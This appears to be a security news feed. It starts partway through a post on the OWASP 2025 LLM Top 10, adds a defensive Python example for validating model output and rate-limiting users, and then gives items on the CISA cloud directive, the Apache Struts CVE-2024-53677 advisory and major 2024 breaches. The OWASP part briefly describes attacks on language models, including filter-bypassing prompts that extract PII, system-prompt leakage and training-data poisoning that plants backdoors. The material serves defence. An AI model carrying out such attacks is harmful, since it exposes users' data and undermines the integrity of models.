Sensitive Information Disclosure is when LLMs inadvertently reveal confidential data. This can result in the exposure of proprietary algorithms, intellectual property, and private or personal information, leading to privacy violations and other security breaches. Sensitive Information Disclosure can be as simple as an unsuspecting legitimate user being shown another user's data while interacting with the LLM application in a non-malicious manner. But it can also be higher-stakes, such as a user crafting a set of prompts to bypass the LLM's input filters and cause it to reveal personally identifiable information (PII). Both scenarios are serious, and both are preventable.

Why the Move?
With the easy integration of LLMs into various systems (databases, internal issue trackers, files, etc.), the risk of sensitive information disclosure has increased significantly. Attackers can exploit these integrations by crafting specific prompts to extract sensitive data such as employee payrolls, PII, health records, and confidential business data. Given the rapid adoption of LLMs in organizational workflows without adequate risk assessments, this issue has been elevated in importance.

Solutions to Sensitive Information Disclosure
To prevent sensitive information disclosure, organizations need to:
- Integrate adequate data input/output sanitization and scrubbing techniques
- Implement robust input validation and sanitization methods
- Practice the principle of least privilege when training models
- Leverage hacker-based adversarial testing to identify possible sensitive information disclosure issues

LLM03: Supply Chain Vulnerabilities
Position change: ↑2

What Are Supply Chain Vulnerabilities?
The supply chain in LLMs can be vulnerable, impacting the integrity of training data, Machine Learning (ML) models, and deployment platforms. Supply Chain Vulnerabilities in LLMs can lead to biased outcomes, security breaches, and even complete system failures. Traditionally, supply chain vulnerabilities have focused on third-party software components, but in the world of LLMs the supply chain attack surface extends to susceptible pre-trained models, poisoned training data supplied by third parties, and insecure plugin design.

Why the Move?
The demand for cost-effective and performant LLMs has led to a surge in the use of open-source models and third-party packages. However, many organizations fail to adequately vet these components, leaving them vulnerable to supply chain attacks. Using unverified models, outdated or deprecated packages, or compromised training data can introduce backdoors, biases, and other security flaws. Recognizing the importance of a secure supply chain in mitigating these risks and their potential legal ramifications, this vulnerability has moved up the list.

Solutions to Supply Chain Vulnerabilities
Supply Chain Vulnerabilities in LLMs can be prevented and identified by:
- Carefully vetting data sources and suppliers
- Using only reputable plug-ins, scoped appropriately to your particular implementation and use cases
- Conducting sufficient monitoring, adversarial testing, and proper patch management

LLM04: Data and Model Poisoning
Position change: ↓1

What Is Data and Model Poisoning?
Training data poisoning refers to the manipulation of training data or fine-tuning processes to introduce vulnerabilities, backdoors, or biases that could compromise the model's security, effectiveness, or ethical behavior. It is considered an integrity attack because tampering with training data impacts the model's ability to output correct predictions.

Solutions to Data and Model Poisoning
Organizations can prevent Training Data Poisoning by:
- Verifying the supply chain of training data, the legitimacy of targeted training data, and the use case for the LLM and the integrated application
- Ensuring sufficient sandboxing to prevent the model from scraping unintended data sources
- Using strict vetting or input filters for specific training data or categories of data sources

LLM05: Improper Output Handling
Position change: ↓3

What Is Improper Output Handling?
Improper Output Handling (called Insecure Output Handling in the 2024 list) occurs when LLM output is accepted without scrutiny, potentially exposing backend systems. Since LLM-generated content can be controlled by prompt input, this behavior is similar to giving users indirect access to additional functionality, such as passing LLM output directly to backend, privileged, or client-side functions. This can, in some cases, lead to severe consequences like XSS, CSRF, SSRF, privilege escalation, or remote code execution.

Solutions to Improper Output Handling
There are three key ways to prevent Improper Output Handling:
- Treating the model output like any other untrusted user content and validating inputs
- Encoding output coming from the model back to users to mitigate undesired code interpretation
- Pentesting to uncover insecure outputs and identify opportunities for more secure output

LLM06: Excessive Agency
Position change: ↑2

What Is Excessive Agency?
Excessive Agency is typically caused by excessive functionality, excessive permissions, and/or excessive autonomy. One or more of these factors enables damaging actions to be performed in response to unexpected or ambiguous outputs from an LLM. This happens regardless of what is causing the LLM to malfunction (confabulation, prompt injection, poorly engineered prompts, etc.) and creates impacts across the confidentiality, integrity, and availability spectrum.

Solutions to Excessive Agency
To avoid Excessive Agency, organizations should:
- Limit tools, functions, and permissions to only the minimum necessary for the LLM
- Tightly scope functions, plugins, and APIs to avoid over-functionality
- Require human approval for major and sensitive actions, and keep an audit log

LLM07: System Prompt Leakage
Position change: New

What Is System Prompt Leakage?
This new entry reflects the growing awareness of the risks of embedding sensitive information in system prompts. System prompts, designed to guide LLM behavior, can inadvertently leak secrets if not carefully constructed. Attackers can exploit this leaked information to facilitate further attacks.

Solutions to System Prompt Leakage
There are many methods to prevent System Prompt Leakage, including:
- Never embed sensitive data in system prompts
- Implement guardrails
- Avoid relying on system prompts for strict behavior control

LLM08: Vector and Embedding Weaknesses
Position change: New

What Are Vector and Embedding Weaknesses?
LLMs rely on vector embeddings to represent and process information. Weaknesses in how these vectors are generated, stored, or retrieved can be exploited to inject harmful content, manipulate model outputs, or access sensitive data. This can lead to unauthorized access, data leakage, embedding inversion attacks, data poisoning, and behavior alteration.

Solutions to Vector and Embedding Weaknesses
Some key ways to prevent Vector and Embedding Weaknesses include:
- Implement granular access controls
- Implement robust data validation pipelines for knowledge sources
- Classify data within the knowledge base to control access levels and prevent data mismatch errors

LLM09: Misinformation
Position change: New

What Is Misinformation?
This category replaces "Overreliance" and addresses the potential for LLMs to generate and disseminate factually incorrect or misleading information. While overreliance contributes to this problem, the focus shifts to the active generation of misinformation, commonly referred to as hallucinations or confabulations.

Solutions to Misinformation
Here are some of the most important methods for preventing Misinformation:
- Always cross-check LLM outputs against trusted external sources
- Break down complex tasks into smaller, manageable subtasks to reduce the likelihood of hallucinations
- Improve output quality through fine-tuning, embedding augmentation, or other techniques

LLM10: Unbounded Consumption
Position change: New

What Is Unbounded Consumption?
This new entry encompasses the risks associated with excessive resource consumption during LLM inference, including computational resources, memory, and API calls. This can lead to denial-of-service conditions, increased costs, and performance degradation. Model Theft and Model Denial of Service, previously separate entries, are now considered subsets of this broader category.

Solutions to Unbounded Consumption
There are several key methods to prevent Unbounded Consumption, including:
- Sanitize and validate user inputs to prevent malicious or overly complex queries
- Implement rate-limiting mechanisms to control the number of requests an LLM can process within a given timeframe
- Restrict access to LLM APIs and resources based on user roles and permissions
- Train models to be resistant to adversarial inputs
- Use sandboxing techniques that restrict the LLM's access to network resources, internal services, and APIs

Securing the Future of LLMs
This new release by the OWASP Foundation enables organizations looking to adopt LLM technology (or that recently did so) to guard against common pitfalls. In many cases, organizations simply are unable to catch every vulnerability. HackerOne is committed to helping organizations secure their LLM applications and to staying at the forefront of security trends and challenges. HackerOne's solutions are effective at identifying vulnerabilities and risks that stem from weak or poor LLM implementations. Conduct continuous adversarial testing through Bug Bounty, targeted hacker-based testing with Challenge, or comprehensively assess an entire application with Pentest or Code Security Audit. Contact us today to learn more about how we can help secure your LLM and secure against LLM vulnerabilities.

by HackerOne
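
The HackerOne piece above lists controls for Improper Output Handling, Excessive Agency and Unbounded Consumption without showing what they look like in code. The following is an added example, not HackerOne's or OWASP's code: it treats a model-emitted tool call as untrusted input, checks it against a constructed allowlist and schema, HTML-encodes free text before rendering, and applies a per-user request budget; the tool names, patterns and limits are all assumptions chosen for illustration.

```python
"""Defensive handling of LLM output and per-user consumption.

Added example (not from the post or from OWASP). Demonstrates three of the
listed mitigations: encode model text before rendering it (LLM05), validate
model-requested actions against an allowlist and require approval for
sensitive ones (LLM05/LLM06), and bound request rate and prompt size (LLM10).
The tool names, regexes and limits are constructed for illustration.
"""
import html
import json
import re
import time
from dataclasses import dataclass, field
from typing import Optional

# Constructed allowlist: the only tools the model may request, with the
# exact argument shape each accepts. Anything outside this is refused.
TOOL_SCHEMAS = {
    "lookup_order": {"order_id": re.compile(r"^[0-9]{6,12}$")},
    "send_receipt": {"order_id": re.compile(r"^[0-9]{6,12}$"),
                     "email": re.compile(r"^[^@\s]+@[^@\s]+\.[a-z]{2,}$")},
}
HIGH_IMPACT_TOOLS = {"send_receipt"}  # side effects: gate behind a human


class OutputRejected(ValueError):
    """Model output failed validation and must not be acted on."""


def render_for_browser(model_text: str) -> str:
    # Encode model text exactly like an untrusted form field so any markup
    # the model emits (or was injected with) is displayed, not interpreted.
    return html.escape(model_text, quote=True)


def validate_tool_call(raw: str) -> dict:
    """Parse a model-emitted tool call and check it against the allowlist.

    Returns {"tool", "args", "needs_approval"} or raises OutputRejected.
    The raw model text itself is never forwarded to the backend.
    """
    try:
        call = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise OutputRejected(f"not JSON: {exc}") from None
    if not isinstance(call, dict) or set(call) != {"tool", "args"}:
        raise OutputRejected("expected exactly the keys 'tool' and 'args'")
    tool, args = call["tool"], call["args"]
    schema = TOOL_SCHEMAS.get(tool)
    if schema is None:
        raise OutputRejected(f"tool not allowlisted: {tool!r}")
    # Reject extra or missing arguments: no room for smuggled parameters.
    if not isinstance(args, dict) or set(args) != set(schema):
        raise OutputRejected("argument set does not match schema")
    for name, pattern in schema.items():
        value = args[name]
        if not isinstance(value, str) or not pattern.match(value):
            raise OutputRejected(f"argument {name!r} failed validation")
    return {"tool": tool, "args": args,
            "needs_approval": tool in HIGH_IMPACT_TOOLS}


def is_accepted(raw: str) -> bool:
    """Convenience wrapper: True if the call would be dispatched."""
    try:
        validate_tool_call(raw)
        return True
    except OutputRejected:
        return False


@dataclass
class ConsumptionGuard:
    """Per-user token bucket plus a hard cap on prompt size."""
    max_prompt_chars: int = 4000
    requests_per_minute: int = 20
    _buckets: dict = field(default_factory=dict)

    def admit(self, user: str, prompt: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        if len(prompt) > self.max_prompt_chars:
            return False  # refuse oversized or overly complex inputs outright
        rpm = float(self.requests_per_minute)
        tokens, last = self._buckets.get(user, (rpm, now))
        # Refill in proportion to elapsed time, never above bucket capacity.
        tokens = min(rpm, tokens + (now - last) * rpm / 60.0)
        if tokens < 1.0:
            self._buckets[user] = (tokens, now)
            return False
        self._buckets[user] = (tokens - 1.0, now)
        return True
```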

Adam Griffin is still in disbelief over how quickly he was robbed of nearly $500,000 in cryptocurrencies. A scammer called using a real Google phone number to warn his Gmail account was being hacked, sent email security alerts directly from google.com, and ultimately seized control over the account by convincing him to click "yes" to a Google prompt on his mobile device.

by Krebs on Security

Specialized AI models provide precise, domain-specific solutions for robotics, biotech, and materials science challenges.

by Hackread

Overview
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has directed the Federal Civilian Executive Branch to implement more than 50 policies to secure Microsoft 365 environments. The new policies, Binding Operational Directive (BOD) 25-01: Implementing Secure Practices for Cloud Services, apply to Azure Active Directory/Entra ID, Microsoft Defender, Exchange Online, Power Platform, SharePoint Online and OneDrive, and Microsoft Teams.

CISA has the authority to secure the more than 100 agencies that make up the FCEB, which doesn't include Defense, National Security, and Intelligence agencies. However, CISA said it "strongly recommends all stakeholders implement these policies ... Doing so will reduce significant risk and enhance collective resilience across the cybersecurity community." CISA plans guidance for other cloud environments next year, including Google Workspace.

The new cloud security directive comes amid a flurry of activity from CISA, including a draft National Cyber Incident Response Plan, as the agency's leadership prepares to depart next month when the new Administration takes office.

Microsoft 365 Security Issues
The Microsoft guidance comes after a year in which Microsoft 365 security came under heavy scrutiny. A U.S. Cyber Safety Review Board (CSRB) report earlier this year detailed "a cascade of security failures at Microsoft" that allowed China-linked threat actors in July 2023 to access "the official email accounts of many of the most senior U.S. government officials managing our country's relationship with the People's Republic of China." A Congressional hearing followed, along with pledges by Microsoft to make security a top priority. Amazon recently paused a Microsoft 365 rollout after discovering security issues, according to a Bloomberg report, bringing fresh attention to the issue.

CISA's Microsoft 365 Directive
CISA's timeline gives federal civilian agencies until June 20, 2025, to "comply with a defined set of these Secure Cloud Baselines, deploy automated configuration assessment tools to check compliance, and to remediate deviations from these policies under BOD 25-01."

The first policy in the directive requires Azure AD and Entra ID implementations to block legacy protocols that don't allow multi-factor authentication (MFA). Other Azure AD and Entra ID policies require that high-risk users and sign-ins be blocked, enforcing phishing-resistant MFA or an alternative, and setting the Authentication Methods Manage Migration feature to Migration Complete. Roughly two-thirds of the 21 policies in the Azure AD and Entra ID section involve securing privileged accounts.

Defender policies call for enabling standard and strict preset security policies, protecting sensitive accounts and information, and enabling logging and alerts. Exchange policies include disabling SMTP AUTH and automatic forwarding to external domains, implementing SPF and DMARC policies, and enabling external sender warnings and mailbox auditing. Power Platform policies call for limiting trial, production, and sandbox creation to admins, creating a DLP policy to restrict connector access in the default Power Platform environment, and enabling tenant isolation. SharePoint Online and OneDrive policies include limiting external sharing and file and folder sharing, and preventing custom scripts on self-service created sites. Teams controls include limiting access for external, unmanaged, and anonymous users, blocking contact with Skype, and disabling email integration.

CISA also provides assessment tools and guidance through the Secure Cloud Business Applications (SCuBA) project.

Conclusion
CISA has provided federal agencies with strong best practices for securing Microsoft 365 environments. These policies, based on principles of least privilege and strict authentication and access control, could also apply to other cloud environments. Cyble's Cloud Security Posture Management (CSPM) and threat intelligence tools offer organizations automated, cost-effective cloud compliance and monitoring, with the ability to detect misconfigurations and leaks before they turn into major incidents. The post CISA Orders Federal Agencies to Secure Microsoft 365 Environments appeared first on Cyble.

by CYBLE

The U.S. has a strategic defense plan and multiple layers of defense for critical infrastructure, but significant gaps remain. This post outlines the critical and non-critical infrastructure sectors and how the U.S. secures these systems.

by Barracuda

Androxgh0st, a botnet targeting web servers since January 2024, is also deploying IoT-focused Mozi payloads, reveals CloudSEK’s latest research.

by Hackread

Technical and organizational precautions when deploying existing AI systems and developing new ones

by Kaspersky

Salt Security, a leading API security company, has announced a new product integration with CrowdStrike, combining the capabilities of the Salt Security API Protection Platform with CrowdStrike Falcon® Next-Gen SIEM. This integration, now available on the CrowdStrike Marketplace, provides customers with API-based attacker telemetry, offering a more comprehensive view of their attack surface, the companies […] The post Salt Security and CrowdStrike Extend Partnership for enhanced API Security appeared first on IT Security Guru.

by IT Security Guru

As the 2027 milestone for Business Suite 7 approaches, SAP's extended support model offers businesses time to plan their transition.

by ITPro Today

Meta Platforms, the parent company of Facebook, Instagram, WhatsApp, and Threads, has been fined €251 million (around $263 million) for a 2018 data breach that impacted millions of users in the bloc, in what's the latest financial hit the company has taken for flouting stringent privacy laws. The Irish Data Protection Commission (DPC) said the data breach impacted approximately 29 million

by The Hacker News

A misconfigured Amazon S3 bucket has exposed 5 million U.S. credit and debit card details, highlighting the critical need for vigilance during the holiday shopping season. The post 5 million payment card details stolen appeared first on ZENDATA Cybersecurity.

by Zendata

The personal data of hundreds of thousands of vulnerable residents is at risk after a threat group attacked a state social services database.

by Cybersecurity Dive

Sophos was also ranked the #1 solution in 36 individual reports spanning the Antivirus, EDR, Endpoint Protection Suites, XDR, Firewall, and MDR markets.

by Sophos News

Kaspersky experts analyze attacks by C.A.S, a cybergang that uses uncommon remote access Trojans and posts data about victims in public Telegram channels.

by Securelist

Meta has been fined €251M ($263M) for a 2018 data breach affecting millions in the EU, marking another penalty for violating privacy laws. The Irish Data Protection Commission (DPC) fined Meta €251 million ($263M) for a 2018 data breach impacting 29 million Facebook accounts. “The Irish Data Protection Commission (DPC) has today announced its final […]

by Security Affairs

Overview
The Australian Cyber Security Center (ACSC) has alerted organizations about a severe vulnerability in the Apache Struts2 Framework. The vulnerability, CVE-2024-53677, has been identified in the Framework, posing a critical risk to organizations that use, develop, or support Java-based applications built on this widely adopted framework. This vulnerability primarily affects versions of Apache Struts2 before 6.4.0 and can lead to severe security breaches, including remote code execution (RCE). Australian organizations using these versions must take immediate action to mitigate the risks posed by this flaw.

CVE-2024-53677 is a critical file upload vulnerability in the Apache Struts2 Framework. It allows attackers to exploit path traversal flaws and manipulate file upload parameters. The flaw is found in the deprecated File Upload Interceptor component. Under certain circumstances, this can lead to the uploading of malicious files that could be executed remotely, potentially giving attackers full control over the affected system. The issue is particularly concerning for enterprise Java applications that rely on Apache Struts2.

Details of Apache Struts2 Framework Vulnerability (CVE-2024-53677)
According to the Apache advisory, the affected versions of Struts include Struts 2.0.0 through 2.3.37 (end-of-life versions), Struts 2.5.0 through 2.5.33, and Struts 6.0.0 through 6.3.0.2. The vulnerability has been classified as "critical," with a CVSSv3 score of 9.8, reflecting its potential for exploitation. This issue is not isolated; Apache Struts vulnerabilities have been popular targets for threat actors, with two major incidents occurring in 2017 and 2023. As such, CVE-2024-53677 must be taken seriously by organizations that continue to use older versions of Struts.

Organizations using Java applications that leverage the affected versions of Apache Struts2 are at high risk of exploitation. This includes various industries such as government, telecommunications, finance, and e-commerce, where the framework remains integral to business operations. The critical nature of CVE-2024-53677 lies in its ability to facilitate remote code execution. Once an attacker successfully uploads a malicious file, often a web shell, through the vulnerable file upload mechanism, they can execute arbitrary commands, steal sensitive data, and further compromise the system.

Recommendations for securing your systems
Organizations are strongly advised to take the following steps to mitigate the risks associated with CVE-2024-53677:
- The most effective way to address the vulnerability is to upgrade to Apache Struts 6.4.0 or a later version. This version replaces the deprecated File Upload Interceptor with the more secure Action File Upload Interceptor, which significantly reduces the risk of exploitation. However, migrating to this new file upload mechanism requires modifications to the existing code, as the old File Upload Interceptor is no longer secure.
- If upgrading to Struts 6.4.0 is not immediately feasible, organizations should apply any available patches for affected versions of Struts. Additionally, continuous monitoring of systems for suspicious activity is crucial. Logs should be reviewed regularly for any indications of attempts to exploit the vulnerability.
- Organizations should audit their Java-based applications to determine whether they are using the affected versions of Apache Struts. They should also verify whether the vulnerable File Upload Interceptor component is being used. Applications that do not rely on this component are not affected by CVE-2024-53677.
- Given the critical nature of this vulnerability, organizations must stay updated on vendor advisories and any new patches or security releases. Apache's security bulletins should be regularly checked to ensure that any new information or mitigation strategies are quickly applied.

Conclusion
CVE-2024-53677 presents a critical risk of remote code execution (RCE), allowing attackers to exploit file upload vulnerabilities and gain unauthorized control over systems. Organizations using Struts2 versions prior to 6.4.0 must upgrade immediately and migrate to the new Action File Upload Interceptor. Prompt patching and monitoring are essential to prevent exploitation. To strengthen defenses, businesses can turn to Cyble's AI-powered cybersecurity solutions like Cyble Vision, which offer advanced threat intelligence, dark web monitoring, and proactive risk detection. Discover how Cyble Vision can enhance your cybersecurity strategy by booking a free demo today.

References:
https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-security-vulnerability-affecting-apache-struts2-below-6-4-0

The post ACSC Warns of Remote Code Execution Risk in Apache Struts2 appeared first on Cyble.

by CYBLE

The mandate to secure cloud environments is responsive to recent cybersecurity incidents, but not one specific threat, agency officials said.

by Cybersecurity Dive

Kaspersky researchers linked a new wave of cyber attacks to the cyber espionage group tracked as The Mask. Kaspersky researchers linked several targeted attacks to a cyber espionage group known as The Mask. The APT group targeted an organization in Latin America in 2019 and 2022. Threat actors accessed an MDaemon email server and used […]

by Security Affairs

A phishing campaign targeting European companies used fake forms made with HubSpot's Free Form Builder, leading to credential harvesting and Azure account takeover. The post Effective Phishing Campaign Targeting European Companies and Organizations appeared first on Unit 42.

by Palo Alto Networks - Unit42

The Cybersecurity and Infrastructure Security Agency (CISA) and the Office of the National Cyber Director (ONCD) have jointly published a comprehensive guide aimed at embedding cybersecurity into federally funded infrastructure projects. Titled Playbook for Strengthening Cybersecurity in Federal Grant Programs for Critical Infrastructure, the guide offers essential tools and resources for grant-making agencies and recipients to incorporate strong cybersecurity practices into their programs and infrastructure initiatives.

This cybersecurity playbook is designed to assist federal grant program managers, critical infrastructure owners and operators, and organizations such as state, local, tribal, and territorial governments that sub-award grant funds or oversee grant-funded projects. With the U.S. making historic investments in infrastructure through legislative acts such as the Infrastructure Investment and Jobs Act (IIJA), the Inflation Reduction Act (IRA), and the CHIPS and Science Act, this guidance emphasizes the critical need for cybersecurity to be integrated into the foundation of these projects.

Key Features of the Cybersecurity Playbook
The playbook provides a structured approach to incorporating cybersecurity into grant programs and offers:
- Recommended actions for integrating cybersecurity throughout the grant lifecycle.
- Model language for Notices of Funding Opportunity (NOFOs) and Terms & Conditions to ensure clear cybersecurity expectations for applicants.
- Templates for grant recipients to create Cyber Risk Assessments and Project Cybersecurity Plans.
- A comprehensive list of cybersecurity resources to support the execution of grant-funded projects securely.

CISA Director Jen Easterly highlighted the significance of this guidance, stating, "As organizations take advantage of historic infrastructure grants, it's critical to ensure the security and resilience of this next generation of American infrastructure in every community across our nation." Harry Coker Jr., White House National Cyber Director, echoed these sentiments, emphasizing the importance of "cybersecurity by design" in rebuilding the nation's critical infrastructure. He noted, "We need infrastructure projects to be shovel-ready and cyber-ready. This guidance will serve as a valuable resource to ensure cybersecurity is a fundamental part of every infrastructure project from the outset."

Minimizing Burden While Maximizing Security
CISA and ONCD have designed the playbook to be flexible and to minimize administrative burden while ensuring that baseline cybersecurity practices are included in federally funded projects. Federal agencies administering grants, sub-awarding organizations, and infrastructure operators are encouraged to adopt the playbook's recommendations to safeguard projects from evolving cyber threats.

Directive to Secure Cloud Services
In addition to the playbook, CISA has issued Binding Operational Directive (BOD) 25-01: Implementing Secure Practices for Cloud Services. This directive mandates federal civilian agencies to strengthen the security of cloud environments by implementing assessment tools and aligning their configurations with CISA's Secure Cloud Business Applications (SCuBA) project. Recent cybersecurity incidents have highlighted the risks posed by cloud misconfigurations, which can enable attackers to gain unauthorized access, exfiltrate data, or disrupt services. In response, BOD 25-01 requires federal agencies to:
- Identify cloud tenants within their scope and report this information to CISA.
- Deploy SCuBA assessment tools for continuous monitoring and alignment with secure configuration baselines.
- Implement mandatory SCuBA policies and update configurations to address evolving threats.

By June 2025, federal civilian agencies must fully implement these requirements to reduce risks associated with cloud vulnerabilities. CISA Director Jen Easterly reiterated the urgency of these measures, stating, "Malicious threat actors are increasingly targeting cloud environments and evolving their tactics. These actions are a crucial step in reducing risk to the federal civilian enterprise. We urge all organizations to adopt this guidance to collectively bolster national cyber resilience."

Strengthening Cloud Security with SCuBA
The SCuBA project underpins this directive by providing consistent security baselines for widely used Software-as-a-Service (SaaS) products, such as Microsoft Office 365. These baselines are complemented by assessment tools that allow agencies to monitor their cloud environments effectively and address deviations from secure configurations. CISA emphasizes the importance of keeping security configurations updated, as outdated settings can expose systems to vulnerabilities. Regular reviews and adjustments ensure agencies remain aligned with evolving best practices and emerging cyber threats.

Why This Matters
The guidance and directives released by CISA and ONCD mark a significant step toward safeguarding U.S. infrastructure and federal networks against cyberattacks. As the nation invests in modernizing its critical infrastructure, integrating cybersecurity from the start will not only enhance resilience but also protect public trust in these vital systems. Federal agencies, grant recipients, and infrastructure operators are encouraged to adopt the playbook and implement the required cloud security measures promptly. These actions are crucial to ensuring that the next generation of American infrastructure is not only innovative but also secure and resilient.

by The Cyber Express

Cyberattacks this year have escalated into a high-stakes battle, with increasingly advanced attacks targeting critical infrastructure, personal data, and corporate systems. From state-sponsored cyberattacks to ransomware campaigns, the top cyberattacks of 2024 have proven that threat actors have been weaponizing advanced technologies to exploit vulnerabilities in both private and public sectors. According to the Cyble Global Cyber Threat Intelligence Overview 2024 report, ransomware attacks surged, with over 2,600 incidents across industries like healthcare, finance, and manufacturing.   Major groups like LockBit and RansomHub are pushing the frequency of attacks to new heights. Dark web activity grew, with over 700 incidents linked to data leaks and malware sales. Additionally, the first half of 2024 saw over 33 billion records leaked, which included the ""Mother of All Breaches"" that exposed 26 billion.   Among the top ransomware attacks of 2024, the BlackCat ransomware group played an important role in numerous breaches. Notably, groups like Volt Typhoon and Salt Typhoon, linked to China, have targeted vital U.S. infrastructure, while cybercriminals such as the BlackCat ransomware group have attacked organizations worldwide, compromising millions of sensitive records.   Companies like Change Healthcare and Dell have faced massive data leaks, affecting tens of millions, and cybercriminals have used platforms like Telegram to distribute stolen data. These incidents are among the biggest data leaks of 2024, impacting millions of users and organizations worldwide.  Meanwhile, advanced cyberattack techniques, such as exploiting vulnerabilities in legacy systems and using malware like KV Botnet, have continued to exploit weak points in global networks. Let’s look at the top cyberattacks of 2024, highlighting the most impactful incidents.  Top Cyberattacks of 2024: Looking Back at the Most Influential Attacks this Year!   
The Cyber Express brings the compiled list of the top 10 cyberattacks of 2024, highlighting the most notorious attacks that affected companies, organizations, cities, individuals and governments worldwide.   1. China-Backed Volt Typhoon Hackers Target U.S. Infrastructure  [caption id=""attachment_99677"" align=""alignnone"" width=""1013""] Source: Federal Agencies[/caption] Volt Typhoon, a China-backed hacker group, recently carried out one of the top cyberattacks of 2024 on critical infrastructure in the U.S. and abroad. The mode of the weapon is reported to be KV Botnet malware, which was used to conceal their cyberattacks. The group exploited vulnerable SOHO routers, particularly Cisco and NetGear devices, which had reached their ""end of life"" and were no longer receiving security updates.   These compromised routers allowed the hackers to target sectors like communications, energy, and transportation. In response, a court-authorized operation led by the FBI, Justice Department, and CISA successfully removed the KV Botnet malware from hundreds of infected routers and severed their connection to the botnet.  This disruption is part of ongoing efforts to protect U.S. infrastructure from state-sponsored cyber threats. Officials called for replacing outdated routers to prevent reinfection and safeguard personal and national security. The FBI also encouraged public vigilance and continued reporting of suspicious activities. This attack is one of the biggest cyberattacks of 2024, with far-reaching implications for U.S. infrastructure  2. Change Healthcare Cyberattack Exposes Personal Data of 110 Million Americans [caption id=""attachment_99678"" align=""alignnone"" width=""1283""] Source: Change Healthcare[/caption] In February 2024, Change Healthcare (CHC) experienced a cyberattack, where hackers accessed sensitive data, including health insurance details, medical records, and personal information of millions of Americans.   
The breach, linked to the BlackCat ransomware group, exposed up to a third of the U.S. population, with potentially 110 million individuals impacted. CHC took immediate action to shut down affected systems and launched an investigation with support from cybersecurity experts and law enforcement.

The company confirmed that data was exfiltrated between February 17 and 20, 2024, and began notifying affected individuals in June. As part of its response, CHC offered two years of complimentary credit monitoring and identity protection services and advised individuals to monitor financial statements and report any suspicious activity.

3. Snowflake Cyberattack Leaks 165 Enterprises' Data

Image source: The Cyber Express

The Snowflake data breach, impacting 165 customers, is considered one of the largest breaches of 2024, potentially affecting hundreds of millions. Snowflake, a U.S.-based cloud data storage company, faced an attack in April 2024, with hackers gaining access via compromised employee credentials.

These credentials were obtained through infostealing malware targeting demo accounts that lacked multi-factor authentication (MFA). Although Snowflake's core systems were not breached, attackers exploited weaknesses in third-party accounts, leading to the compromise of sensitive data from several high-profile clients.

Companies such as Santander Group, TicketMaster, LendingTree, and Pure Storage were among those affected. For instance, TicketMaster reported the potential exposure of 560 million user details and card information. Snowflake emphasized that there were no breaches within its platform, but security flaws, including outdated credentials and lack of MFA, were key contributors.

Snowflake has since collaborated with customers to enhance security, recommending MFA enforcement, regular credential rotation, and network access restrictions.

4. Dell Data Breach

Image source: Dell

Dell confirmed a data breach after a threat actor claimed to have stolen approximately 49 million customer purchase records. The breach, which affected a Dell portal containing non-financial customer data, exposed information such as names, physical addresses, order details, and warranty information, but did not include financial data, email addresses, or phone numbers.

Dell assured customers that no payment information had been compromised and said it was working with law enforcement and a third-party forensics firm to investigate the incident. The stolen data was later put up for sale on an underground forum by a hacker known as "Menelik," who claimed to possess personal and company information from 7 million individual purchases and 11 million consumer business records.

While Dell did not confirm the sale, the threat actor detailed the data, which spanned from 2017 to 2024, including system shipment dates, service tags, and warranty details. Although the sale ceased, Dell warned customers about potential phishing and smishing attacks.

5. Ascension Health Faced $1.8 Billion Loss After Cyberattack Disruption

Image source: Ascension Health

In May 2024, Ascension Health, one of the largest nonprofit health systems in the U.S., experienced a massive cyberattack that disrupted its operations and hindered its financial recovery. The cyberattack severely impacted clinical operations, caused systemwide disruptions, and led to additional expenses for remediation.

As a result, Ascension's operating loss for the fiscal year ended at $1.8 billion, a setback after its earlier recovery. The attack also disrupted services, forcing Ascension to take certain systems offline and temporarily sever connections with business partners.
Despite this setback, Ascension's overall financial performance for FY24 showed a $1.2 billion improvement over the previous year, demonstrating the strength of its recovery efforts before the cyberattack.

6. Ransomware Attack Disrupts CDK Global, Impacting 15,000 Dealerships

Image source: The Cyber Express

In late June 2024, a ransomware attack on CDK Global, a key software provider for car dealerships, severely disrupted operations for major automotive retailers across North America. Companies such as Asbury Automotive, AutoNation, Lithia Motors, Penske, and Group 1 Automotive reported impacts due to the shutdown of CDK Global's systems.

These systems, essential for managing sales, inventory, financing, and customer relationships, were temporarily halted as CDK took precautionary measures. The attack affected over 15,000 dealerships, forcing many to revert to manual processes to continue operations.

Asbury and other affected companies activated incident response plans, but the full extent of the data compromise remained unclear. Lithia Motors and Group 1 Automotive expressed concerns over the long-term financial impact, while Penske implemented contingency plans to maintain operations at its truck dealerships. CDK Global, which was negotiating with the ransomware group BlackSuit, acknowledged the attack and began working with third-party experts to assess the damage.

7. City of Columbus Cyberattack by Rhysida Ransomware

Image source: The Columbus Dispatch

The City of Columbus experienced a cyberattack by the Rhysida ransomware group, which claimed to have stolen 6.5 terabytes of data, including employee passwords. However, Mayor Andrew Ginther confirmed that the stolen data was either encrypted or corrupted, making it largely unusable.
He assured the public that no personal information had been leaked onto the dark web, offering some relief to residents and city employees.

The cyberattack did not involve a ransom demand, which is unusual for ransomware attacks. Despite fears of compromised data, Ginther emphasized that any subsequent theft of personal information was likely unrelated to this specific incident. To protect employees, the city offered free credit monitoring and identity theft protection services, extending this to former employees as well.

In response, the city enhanced its cybersecurity measures and increased training for employees. The attack, which stemmed from a compromised website download, led to a quick response from the city's Department of Technology and collaboration with federal agencies.

8. Star Health Data Breach Leaked Sensitive Customer Info on Telegram

Image source: Star Health

Sensitive customer information from Star Health and Allied Insurance, India's largest health insurer, was found publicly accessible on Telegram and other websites. The breach, which surfaced in August 2024, involved millions of customers' medical reports, policy documents, and personal details being sold online. The threat actor, known as "xenZen," used Telegram chatbots to distribute free samples of the data while selling bulk information on the cybercrime platform BreachForums.

The breach raised security concerns at Star Health as the data was readily accessible despite the company's assurances. Telegram, a widely used messaging platform, was implicated for its role in facilitating the breach, as its chatbot feature was exploited by cybercriminals. Despite the platform's efforts to remove the chatbots, new ones quickly emerged, continuing to sell the stolen data. Star Health confirmed the breach and assured customers that it was working with law enforcement to address the issue.

9. Cencora Confirms Data Breach in Patient Support Programs, Offers Free Identity Protection

Image source: The Cyber Express

In February 2024, Cencora, Inc. discovered unauthorized access to its information systems, potentially exposing personal data through its Lash Group affiliate's patient support programs for Bristol Myers Squibb. The breach was detected on February 21, 2024, and after containment and investigation, it was confirmed by April 10, 2024, that some individuals' personal information, including names, addresses, birth dates, health diagnoses, medications, and prescriptions, was involved.

